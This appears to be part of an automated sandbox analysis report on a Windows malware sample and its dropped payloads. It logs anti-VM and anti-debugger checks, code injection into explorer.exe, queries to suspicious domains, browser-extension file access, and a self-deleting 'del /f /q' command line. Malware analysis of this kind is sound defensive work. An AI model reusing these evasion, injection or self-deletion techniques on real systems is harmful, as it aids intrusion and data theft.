                        Source: C:\Users\user\AppData\Local\Temp\C169.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 585
                        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 352
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_004065D0
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013F2823 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeFile opened / queried: VBoxGuest
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeFile opened: PhysicalDrive0
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                        Source: A70A.exe, 0000000B.00000002.596594969.00000000018B1000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwarePCT2WF3FWin32_VideoControllerFR1S6ED1VideoController120060621000000.000000-00082035712display.infMSBDA1ZWMS9RNPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors8G6D26ZC
                        Source: C169.exe, 00000017.00000002.578609162.0000000001017000.00000004.00000001.sdmpBinary or memory string: VMware
                        Source: C169.exe, 00000017.00000002.605485647.00000000068A5000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
                        Source: EE61.exe, 0000001F.00000002.578653950.000000000150D000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7A
                        Source: explorer.exe, 00000004.00000000.340612665.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: explorer.exe, 00000004.00000000.359571061.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
                        Source: explorer.exe, 00000004.00000000.340612665.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
                        Source: D375.exe, 0000001A.00000002.601649001.0000000001571000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: WerFault.exe, 0000001B.00000002.566769297.0000000004810000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
                        Source: C169.exe, 00000017.00000002.578609162.0000000001017000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwarePCT2WF3FWin32_VideoControllerFR1S6ED1VideoController120060621000000.000000-00082035712display.infMSBDA1ZWMS9RNikjI
                        Source: A70A.exeBinary or memory string: \.\VBoxGuest
                        Source: explorer.exe, 00000004.00000000.354712312.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
                        Source: AA02.exe, 00000016.00000002.528893220.00000000008FB000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.566899937.000000000484B000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.558307851.000000000484B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                        Source: A70A.exe, 0000000B.00000002.598873693.0000000003300000.00000040.00000001.sdmpBinary or memory string: !"K\\.\VBoxGuest
                        Source: explorer.exe, 00000004.00000000.323430367.000000000EF34000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}uuuuvvvvvvuuuu
                        Source: AA02.exe, 00000016.00000002.528893220.00000000008FB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW,
                        Source: A70A.exeBinary or memory string: \\.\VBoxGuest
                        Source: C169.exe, 00000017.00000002.605280039.0000000006871000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: explorer.exe, 00000004.00000000.340612665.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                        Source: AA02.exe, 00000016.00000002.528450541.00000000008D1000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWx=
                        Source: D375.exe, 0000001A.00000002.601649001.0000000001571000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00401240 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00401050 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_004096C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00408360 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00405990 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CopyFileA,DeleteFileA,_strtok_s,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00409260 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_004094F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeSystem information queried: ModuleInformation

                        Anti Debugging:

                        Tries to detect sandboxes and other dynamic analysis tools (window names)
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: gbdyllo
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: ollydbg
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeOpen window title or class name: windbgframeclass
                        Hides threads from debuggers
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeThread information set: HideFromDebugger
                        Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeSystem information queried: CodeIntegrityInformation
                        Source: C:\Users\user\AppData\Roaming\ddigjgjSystem information queried: CodeIntegrityInformation
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeSystem information queried: CodeIntegrityInformation
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_004087FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_02BC0083 push dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_04790042 push dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00401000 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0040BDE0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00891F83 push dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\ddigjgjProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess queried: DebugFlags
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeFile opened: NTICE
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeFile opened: SICE
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_00406436 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0040B240 GetProcessHeap,RtlAllocateHeap,
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013F2823 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSystem information queried: KernelDebuggerInformation
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_004027ED LdrLoadDll,
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeMemory allocated: page read and write | page guard
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_00406436 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_0040529C SetUnhandledExceptionFilter,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_00402FAF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00413711 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0041651C SetUnhandledExceptionFilter,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00413531 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                        HIPS / PFW / Operating System Protection Evasion:

                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-7000.com
                        Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                        Source: C:\Windows\explorer.exeDomain query: host-file-host-3.com
                        Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                        Benign windows process drops PE files
                        Source: C:\Windows\explorer.exeFile created: ddigjgj.4.dr
                        Maps a DLL or memory area into another process
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                        Source: C:\Users\user\AppData\Roaming\ddigjgjSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Users\user\AppData\Roaming\ddigjgjSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\AppData\Roaming\ddigjgjMemory written: C:\Users\user\AppData\Roaming\ddigjgj base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeMemory written: C:\Users\user\AppData\Local\Temp\C169.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeMemory written: C:\Users\user\AppData\Local\Temp\B6B5.exe base: 400000 value starts with: 4D5A
                        Contains functionality to inject code into remote processes
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_04790110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                        Creates a thread in another existing process (thread injection)
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeThread created: C:\Windows\explorer.exe EIP: 4E91930
                        Source: C:\Users\user\AppData\Roaming\ddigjgjThread created: unknown EIP: 7651930
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeThread created: unknown EIP: 5A91930
                        .NET source code references suspicious native API functions
                        Source: C169.exe.4.dr, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 11.2.A70A.exe.12e0000.0.unpack, l2vD8Fitdl8qSVEp19/mEqmoE9UxRmX9ogcto.csReference to suspicious API methods: ('CXGWjLQ8Hp', 'LoadLibrary@kernel32'), ('REpW7ZaJOo', 'GetProcAddress@kernel32')
                        Source: 11.2.A70A.exe.12e0000.0.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 16.0.C169.exe.900000.1.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 16.0.C169.exe.900000.0.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 16.0.C169.exe.900000.2.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 16.0.C169.exe.900000.3.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 16.2.C169.exe.900000.0.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 23.0.C169.exe.990000.2.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 23.0.C169.exe.990000.5.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 23.2.C169.exe.400000.0.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 23.0.C169.exe.990000.7.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeProcess created: C:\Users\user\Desktop\QMn13jz6nj.exe "C:\Users\user\Desktop\QMn13jz6nj.exe"
                        Source: C:\Users\user\AppData\Roaming\ddigjgjProcess created: C:\Users\user\AppData\Roaming\ddigjgj C:\Users\user\AppData\Roaming\ddigjgj
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess created: C:\Users\user\AppData\Local\Temp\C169.exe C:\Users\user\AppData\Local\Temp\C169.exe
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\AA02.exe" & exit
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeProcess created: C:\Users\user\AppData\Local\Temp\B6B5.exe C:\Users\user\AppData\Local\Temp\B6B5.exe
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess created: C:\Users\user\AppData\Local\Temp\EE61.exe C:\Users\user\AppData\Local\Temp\EE61.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                        Source: explorer.exe, 00000004.00000000.315554642.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.350341132.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.332266279.00000000011E0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.442571738.00000000034B0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.446096328.00000000034B0000.00000002.00020000.sdmp, C169.exe, 00000017.00000002.579526264.0000000001680000.00000002.00020000.sdmp, D375.exe, 0000001A.00000002.602370796.0000000001BB0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                        Source: explorer.exe, 00000004.00000000.349854626.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.315345388.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.330878431.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
                        Source: explorer.exe, 00000004.00000000.315554642.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.350341132.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.317252454.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.332266279.00000000011E0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.442571738.00000000034B0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.446096328.00000000034B0000.00000002.00020000.sdmp, C169.exe, 00000017.00000002.579526264.0000000001680000.00000002.00020000.sdmp, D375.exe, 0000001A.00000002.602370796.0000000001BB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: explorer.exe, 00000004.00000000.315554642.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.350341132.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.332266279.00000000011E0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.442571738.00000000034B0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.446096328.00000000034B0000.00000002.00020000.sdmp, C169.exe, 00000017.00000002.579526264.0000000001680000.00000002.00020000.sdmp, D375.exe, 0000001A.00000002.602370796.0000000001BB0000.00000002.00020000.sdmpBinary or memory string: Progman
                        Source: explorer.exe, 00000004.00000000.315554642.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.350341132.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.332266279.00000000011E0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.442571738.00000000034B0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.446096328.00000000034B0000.00000002.00020000.sdmp, C169.exe, 00000017.00000002.579526264.0000000001680000.00000002.00020000.sdmp, D375.exe, 0000001A.00000002.602370796.0000000001BB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                        Source: explorer.exe, 00000004.00000000.321134099.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.340710494.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.359571061.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,LocalFree,
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A70A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Users\user\AppData\Local\Temp\C169.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EE61.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
